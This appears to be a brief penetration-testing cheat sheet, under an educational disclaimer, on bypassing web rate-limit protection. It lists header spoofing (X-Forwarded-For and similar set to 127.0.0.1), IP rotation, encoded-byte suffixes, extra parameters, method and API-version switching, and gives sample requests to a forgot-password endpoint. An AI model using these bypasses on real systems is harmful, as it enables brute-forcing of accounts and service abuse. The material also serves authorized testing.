Disclaimer: This material is provided for educational purposes and authorized security testing only.
You are solely responsible for how
you use the information. Do not use these techniques on systems without explicit permission from the owner.
We
do not encourage any kind of illegal or harmful activity
Bypassing Rate Limit Protection
- Ip Rotator - If developer implemented rate limit in such a way that the application blocks the ip address of attacker after few requests, then you may try using IP Rotator to change your IP in each requests.
- Add the following headers in the request:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Instead of 127.0.0.1, try using 127.0.0.2, 127.0.0.3,...
Even you can try using double X-Forwared-For header:
X-Forwarded-For:
X-Forwarded-For: 127.0.0.1
- Try changing user-agent, cookies.
- Append null bytes (%00, %0d%0a, %0d, %0a, %09, %0C, %20) to the original endpoint (Ex:
POST /forgot-password%20 HTTP/1.1
).
Also try adding the bytes after the value of parameter (like email=tuhin@gmail.com%20
)
- Race condition. Read this as a reference.
- Add any random parameter in the request.
POST /forgot-password?fake=1 HTTP/1.1
Host: target.com
...
email=target@gmail.com&alsofake=2
- Change the request body (Form to JSON, XML or vice-versa).
- Change request methods (POST to PUT or GET).
- If developer implemented captcha based protection then try Captcha Bypass Techniques.
- Gmail + and . trick.
- Change api version (Ex: api/v2/1729/confirm-email to api/v1/1729/confirm-email).